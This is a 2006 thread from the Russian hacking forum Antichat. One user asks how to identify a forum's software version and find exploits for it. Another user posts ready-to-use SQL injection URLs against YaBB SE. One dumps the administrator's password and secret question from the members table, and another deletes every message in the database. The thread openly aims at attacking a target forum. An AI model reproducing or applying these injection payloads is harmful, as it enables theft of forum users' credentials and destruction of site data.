ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как узнать версию форума?
  #1  
Старый 10.07.2006, 08:15
Аватар для Sulf aka Joker
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
Thumbs up Как узнать версию форума?

А конкретно Этот форум, попутно, есть ли на него какие нить уязвимости?
 
Ответить с цитированием

  #2  
Старый 10.07.2006, 08:36
Аватар для SMiX
SMiX
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850

Репутация: 174
По умолчанию

Могу сказать одно. Yabb. Уязвимости на него есть. Естественно, не на все версии. Попробуй сплои для ябы - авось, версия старая...
 
Ответить с цитированием

  #3  
Старый 10.07.2006, 08:38
Аватар для Sulf aka Joker
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
По умолчанию

Yabb, да, ты крут, знаю что ябб. Но какой? 1.х, 2.х, Голд или какие еще есть. Если не затруднит, подбрось мне ссылочку на сплойты, а то поиск выдал топики где конкретного ничего не сказали.

п.с аватары на форуме выключены.
 
Ответить с цитированием

  #4  
Старый 10.07.2006, 09:32
Аватар для zyl
zyl
Познающий
Регистрация: 19.04.2006
Сообщений: 40
Провел на форуме:
2905481

Репутация: 47
Отправить сообщение для zyl с помощью ICQ
По умолчанию

Конечно я тебе ничем не помогу но попробуй следущее:

1. SQL инъекция в '$msg' параметре:
Код:
http://vulnhost/forum/index.php?board=1;action=modif y;threadid=1;quote=1;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,
concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null, null,null,
null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
2. SQL инъекция в параметре '$postid' в функции ModifyMessage2:
Код:
postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
Пример эксплоита, который удаляет все сообщения их базы данных:
Код:
http://[target]/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;
sesc=aa e1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;
postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
Если появятся лишние пробелы - убери
 
Ответить с цитированием

  #5  
Старый 10.07.2006, 10:51
Аватар для Sulf aka Joker
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
По умолчанию

zyl,
Произошла Ошибка!

Невозможно открыть .txt
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как узнать пароли участников форума с правами админа? WEED Форумы 9 14.05.2006 19:24
Как админ форума ( phpBB ) может узнать пароль пользователя форума ? Майор Форумы 6 08.11.2004 12:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ